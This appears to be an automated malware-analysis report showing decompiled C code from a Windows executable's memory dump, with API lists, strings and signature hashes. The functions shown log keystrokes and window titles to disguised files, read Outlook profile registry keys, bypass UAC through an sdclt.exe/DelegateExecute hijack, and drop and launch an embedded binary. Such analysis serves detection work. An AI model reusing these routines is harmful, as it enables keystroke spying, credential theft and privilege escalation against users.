                                  0x00408e86
                                  0x00408ebd
                                  0x00408ec3
                                  0x00408ed0
                                  0x00408ed4
                                  0x00408ee2
                                  0x00408ee7
                                  0x00408eff
                                  0x00408f05
                                  0x00408f0c
                                  0x00408f0f
                                  0x00408f0f
                                  0x00408f19
                                  0x00408f22
                                  0x00408f2a
                                  0x00408f2e
                                  0x00408f46
                                  0x00408f4e
                                  0x00408f4f
                                  0x00408f59
                                  0x00408f67
                                  0x00408f6b
                                  0x00408f9a
                                  0x00408f9a
                                  0x00000000
                                  0x00408f6d
                                  0x00408f6d
                                  0x00408f70
                                  0x00408f79
                                  0x00408f84
                                  0x00408f94
                                  0x00408f98
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00408f98
                                  0x00408f9e
                                  0x00408fa2
                                  0x00408faf
                                  0x00408faf

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00408D21
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408D90
                                  • lstrcatW.KERNEL32 ref: 00408DAA
                                  • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00408DB6
                                  • lstrcpyW.KERNEL32(?,-00000010), ref: 00408DF0
                                  • lstrcatW.KERNEL32 ref: 00408E03
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00411446: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                  • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408E86
                                  • wsprintfW.USER32 ref: 00408EBD
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408EFF
                                  • CloseHandle.KERNEL32(00000000), ref: 00408F0F
                                  • RegisterClassW.USER32 ref: 00408F2E
                                  • CreateWindowExW.USER32 ref: 00408F46
                                  • GetMessageA.USER32 ref: 00408F67
                                  • TranslateMessage.USER32 ref: 00408F79
                                  • DispatchMessageA.USER32 ref: 00408F84
                                  • GetMessageA.USER32 ref: 00408F94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                  • API String ID: 2678186124-2372768292
                                  • Opcode ID: e8fe0edbe75c1bf9ffff53e5edc91f27ce3bf57788baf6ddfe9d2ea03ef54f84
                                  • Instruction ID: 5c496a3f65fd177ded775e206ced170c84e42a303c2806b3eceb831f6cf01448
                                  • Opcode Fuzzy Hash: e8fe0edbe75c1bf9ffff53e5edc91f27ce3bf57788baf6ddfe9d2ea03ef54f84
                                  • Instruction Fuzzy Hash: 51718172604304ABC320DBA5DC45EABB7FCEB89704F00492EF685E3291DB39D945CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040983D, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0040983D(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E004011C0(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E00401052( &_v4116, 0, 0x800);
				E00401052( &_v8212, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					if(__eflags != 0) {
						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E004099FF(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}















                                  0x0040983d
                                  0x0040983d
                                  0x00409845
                                  0x00409852
                                  0x00409856
                                  0x00409860
                                  0x00409871
                                  0x00409898
                                  0x004098b3
                                  0x004098b5
                                  0x004098d0
                                  0x004098d2
                                  0x004098e1
                                  0x004098ee
                                  0x004098f0
                                  0x004099f8
                                  0x004099f8
                                  0x00000000
                                  0x004099f8
                                  0x004098f6
                                  0x004098f7
                                  0x00409904
                                  0x00409922
                                  0x00000000
                                  0x00000000
                                  0x0040992b
                                  0x004099f3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409931
                                  0x00409931
                                  0x00409933
                                  0x00409955
                                  0x00000000
                                  0x00000000
                                  0x0040995e
                                  0x00409972
                                  0x00409980
                                  0x00409994
                                  0x004099b1
                                  0x004099b3
                                  0x004099b5
                                  0x00000000
                                  0x00000000
                                  0x004099b7
                                  0x004099bb
                                  0x004099be
                                  0x004099c6
                                  0x004099e7
                                  0x00000000
                                  0x00000000
                                  0x004099e9
                                  0x004099ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004099ed
                                  0x00000000
                                  0x00409931
                                  0x004098d4
                                  0x00000000
                                  0x004098d4
                                  0x004098b7
                                  0x00000000
                                  0x004098b7
                                  0x0040989a
                                  0x00000000

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00409894
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 004098B1
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00409904
                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040991A
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040994D
                                  • RegCloseKey.ADVAPI32(?), ref: 0040995E
                                  • lstrcpyW.KERNEL32(?,?), ref: 00409972
                                  • lstrcatW.KERNEL32 ref: 00409980
                                  • lstrcatW.KERNEL32 ref: 00409994
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099B1
                                  • RegCloseKey.ADVAPI32(?,?), ref: 004099C6
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099E3
                                  Strings
                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098C4, 004098D4
                                  • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098E1, 004098E6, 004098F6
                                  • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040989A
                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098A7, 004098B7
                                  • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040988A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                  • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                  • API String ID: 1891545080-2020977430
                                  • Opcode ID: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction ID: b767e8cf4ef787b214c4ffa932510dbda8161c68e187407f9f6ec9346f9c833f
                                  • Opcode Fuzzy Hash: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction Fuzzy Hash: E1411EB290021DBEEB20DA91CC85EFB777CEF05384F1005BAB515F2151E6789E85ABA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041313A, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90sleepregistrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0041313A(void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				char _v1616;
				short* _t53;

				if(E0041111B() != 1) {
					CloseHandle( *0x559cb0);
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					if(_v8 != 0) {
						_t47 =  &_v12;
						E00410CFF( &_v12);
					}
					E00412E91();
					E00401052( &_v1616, 0, 0x400);
					GetModuleFileNameA(0,  &_v1616, 0x400);
					E00412E2C(_t47, 0x418fe6,  &_v1616);
					E00412E2C(_t47, "DelegateExecute", 0x418fe6);
					GetSystemDirectoryW( &_v592, 0x104);
					lstrcatW( &_v592, L"\\sdclt.exe");
					_t53 = L"open";
					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
					asm("movaps xmm0, [0x41a900]");
					_v72.lpFile =  &_v592;
					_v72.cbSize = 0x3c;
					_v72.fMask = 0x40;
					_v72.hwnd = 0;
					_v72.lpVerb = _t53;
					asm("movups [ebp-0x30], xmm0");
					ShellExecuteExW( &_v72);
					TerminateProcess(_v72.hProcess, 0);
					if(_v8 != 0) {
						E00410CD8( &_v12);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				return 0;
			}









                                  0x0041314d
                                  0x00413159
                                  0x00413165
                                  0x0041316f
                                  0x00413178
                                  0x0041317a
                                  0x0041317d
                                  0x0041317d
                                  0x00413182
                                  0x00413195
                                  0x004131a6
                                  0x004131b9
                                  0x004131c4
                                  0x004131d8
                                  0x004131ea
                                  0x004131fa
                                  0x00413202
                                  0x00413208
                                  0x00413215
                                  0x0041321c
                                  0x00413223
                                  0x0041322a
                                  0x0041322d
                                  0x00413230
                                  0x00413234
                                  0x0041323e
                                  0x00413247
                                  0x0041324c
                                  0x0041324c
                                  0x00413256
                                  0x00413266
                                  0x0041326d
                                  0x0041326d
                                  0x00413278

                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00413159
                                  • GetCurrentProcess.KERNEL32(?), ref: 00413168
                                  • IsWow64Process.KERNEL32(00000000), ref: 0041316F
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 004131A6
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004131D8
                                  • lstrcatW.KERNEL32 ref: 004131EA
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413202
                                  • ShellExecuteExW.SHELL32(?), ref: 00413234
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041323E
                                  • Sleep.KERNEL32(000007D0), ref: 00413256
                                  • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00413266
                                  • ExitProcess.KERNEL32 ref: 0041326D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseCurrentExecuteHandleShellToken$DeleteDirectoryExitFileInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                  • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                  • API String ID: 3164795406-2081737068
                                  • Opcode ID: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction ID: 1975b8516974a034e8a1e4695efa9b733e37ae44b87f84d9a85a70a28b88c4fa
                                  • Opcode Fuzzy Hash: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction Fuzzy Hash: 5931AE71C42118BBCB10AFA0DC48EDEBB7CEF44315F1040AAF909E2250D7785A95CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00415169, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00415169(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t38;
				void* _t40;
				void* _t83;

				_t75 =  *_a4;
				_t68 = __ecx + 4;
				_v8 = __ecx + 4;
				E00403549(_t68, E00413441( *_a4 + 4,  *_t75));
				E00405FEB(_a4);
				_t38 = LoadResource(0, _a4);
				_a4 = SizeofResource(0, _a4);
				_t40 = LockResource(_t38);
				E00401052( &_v1096, 0, 0x400);
				E00401052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t40, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E00401052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}












                                  0x00415178
                                  0x0041517a
                                  0x00415180
                                  0x00415191
                                  0x00415199
                                  0x004151a4
                                  0x004151b7
                                  0x004151ba
                                  0x004151d0
                                  0x004151de
                                  0x004151f4
                                  0x00415208
                                  0x00415216
                                  0x00415224
                                  0x00415246
                                  0x00415251
                                  0x00415258
                                  0x0041526b
                                  0x00415288
                                  0x00415294
                                  0x0041529b
                                  0x004152a7
                                  0x004152ae
                                  0x004152b1
                                  0x004152b7
                                  0x004152bd
                                  0x004152c2
                                  0x004152c7
                                  0x004152ca
                                  0x004152cd
                                  0x004152d0
                                  0x004152d3
                                  0x004152e0

                                  APIs
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • LoadResource.KERNEL32(00000000,?,00000000), ref: 004151A4
                                  • SizeofResource.KERNEL32(00000000,?), ref: 004151B0
                                  • LockResource.KERNEL32(00000000), ref: 004151BA
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 004151F4
                                  • lstrcatA.KERNEL32(?,find.exe), ref: 00415208
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 00415216
                                  • lstrcatA.KERNEL32(?,find.db), ref: 00415224
                                  • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 0041523F
                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00415251
                                  • CloseHandle.KERNEL32(00000000), ref: 00415258
                                  • wsprintfA.USER32 ref: 00415288
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 004152D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                  • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                  • API String ID: 2504251837-265381321
                                  • Opcode ID: ea5cf1ea91d2c40a25a976611a3c9f78221addc3422e44743eda63b5f05cf4dc
                                  • Instruction ID: a64ecab57c3cf55662885f0afd46cea5e91dac6a4cbb1ef5118ba8298ebcf816
                                  • Opcode Fuzzy Hash: ea5cf1ea91d2c40a25a976611a3c9f78221addc3422e44743eda63b5f05cf4dc
                                  • Instruction Fuzzy Hash: C7411FB190021DABDB10DFA5DD85EDEBBBCFF89304F108166F609A2150DB749A858FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407F94, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135windowstringfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00407F94(void* __edx, void* __eflags) {
				short _v176;
				struct tagMSG _v204;
				void* _v208;
				struct _SYSTEMTIME _v228;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t40;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				void* _t59;
				struct HINSTANCE__* _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t90;

				_t90 = __eflags;
				_t71 = __edx;
				_t19 = GetModuleHandleA(0);
				_t62 =  *0x42675c; // 0x0
				_t60 = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00401052(_t62 + 0x210, 0, 0x800);
				_t22 =  *0x42675c; // 0x0
				E00401052(_t22 + 0x10, 0, 0x208);
				_t25 =  *0x42675c; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
				_t27 =  *0x42675c; // 0x0
				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v228);
				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
				_t40 =  *0x42675c; // 0x0
				lstrcatW(_t40 + 0x10,  &_v176);
				_t64 =  *0x42675c; // 0x0
				_t11 = _t64 + 0x10; // 0x10
				E00403411(_t64 + 0xc, _t71, _t11);
				_t45 =  *0x42675c; // 0x0
				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t66 =  *0x42675c; // 0x0
				 *(_t66 + 4) = _t46;
				CloseHandle(_t46);
				_v228.wYear = 0;
				_t68 = E004134A2("c:\\windows\\system32\\user32.dll",  &_v228);
				_t49 = E00411EF1(_t68, 0, _t90);
				_t91 = _t49;
				if(_t49 == 0) {
					_t50 =  *0x426758; // 0x0
				} else {
					_push(_t68);
					_t50 = E00411E88(_t49, "SetWindowsHookExA", _t91);
					 *0x426758 = _t50;
				}
				 *_t50(0xd, E00408125, _t60, 0);
				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
					TranslateMessage( &_v204);
					DispatchMessageA( &_v204);
				}
				return 0;
			}


























                                  0x00407f94
                                  0x00407f94
                                  0x00407fa5
                                  0x00407fab
                                  0x00407fb5
                                  0x00407fbf
                                  0x00407fc5
                                  0x00407fc6
                                  0x00407fc7
                                  0x00407fcc
                                  0x00407fd1
                                  0x00407fe3
                                  0x00407fe8
                                  0x00407ff9
                                  0x00407fff
                                  0x00408013
                                  0x0040801a
                                  0x0040804e
                                  0x0040805c
                                  0x00408065
                                  0x00408067
                                  0x0040806d
                                  0x00408074
                                  0x00408079
                                  0x00408091
                                  0x00408097
                                  0x0040809e
                                  0x004080a1
                                  0x004080ab
                                  0x004080bb
                                  0x004080bd
                                  0x004080c2
                                  0x004080c4
                                  0x004080db
                                  0x004080c6
                                  0x004080c6
                                  0x004080ce
                                  0x004080d4
                                  0x004080d4
                                  0x004080e9
                                  0x0040810c
                                  0x004080fb
                                  0x00408106
                                  0x00408106
                                  0x00408122

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00407FA5
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00407FF9
                                  • lstrcatW.KERNEL32 ref: 00408013
                                  • GetLocalTime.KERNEL32(?), ref: 0040801A
                                  • wsprintfW.USER32 ref: 0040804E
                                  • lstrcatW.KERNEL32 ref: 00408065
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408091
                                  • CloseHandle.KERNEL32(00000000), ref: 004080A1
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00411EF1: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,7671826E,00000000,?,?,?,?,004080C2), ref: 00411F1D
                                  • GetMessageA.USER32 ref: 00408114
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • TranslateMessage.USER32 ref: 004080FB
                                  • DispatchMessageA.USER32 ref: 00408106
                                  Strings
                                  • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408048
                                  • SetWindowsHookExA, xrefs: 004080C7
                                  • c:\windows\system32\user32.dll, xrefs: 004080AF
                                  • \Microsoft Vision\, xrefs: 0040800D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                  • API String ID: 1431388325-3884914687
                                  • Opcode ID: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction ID: 6c2511fb03697e5af89a4dd955d9eabc72836af2c0e76f94d97bcee5e6e5c3d3
                                  • Opcode Fuzzy Hash: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction Fuzzy Hash: 15418271604300ABD3209BA9EC49FAB77ECEBC8748F00486EFA45D3291DA79D945C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085CB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004085CB(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E00401052( &_v536, 0, 0x208);
				_v8 = 0;
				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E00403411( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E004036F7( &_v12,  &_v536);
					E00403447(E0040357C( &_v8, _t94, _t106, "{"), _t106, _t73);
					E0040357C(_t74, _t94, _t106, "}");
					E00405FEB(_v12);
					_v12 = 0;
				}
				_t37 =  *0x42675c; // 0x0
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x42675c; // 0x0
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x42675c; // 0x0
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t70 = E0040335A( &_v8, E004036F7( &_v12, _t40 + 0x210));
					E00405FEB(_v12);
					_t40 =  *0x42675c; // 0x0
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x42675c; // 0x0
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x8
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x42675c; // 0x0
					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
					_t57 =  *0x42675c; // 0x0
					_t59 = E00403373( &_v8);
					_t61 =  *0x42675c; // 0x0
					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x42675c; // 0x0
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x42675c; // 0x0
					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x42675c; // 0x0
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x8
				_t46 = lstrlenW(_t97);
				_t48 =  *0x42675c; // 0x0
				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x42675c; // 0x0
				CloseHandle( *(_t50 + 4));
				return E00405FEB(_v8);
			}
































                                  0x004085cb
                                  0x004085de
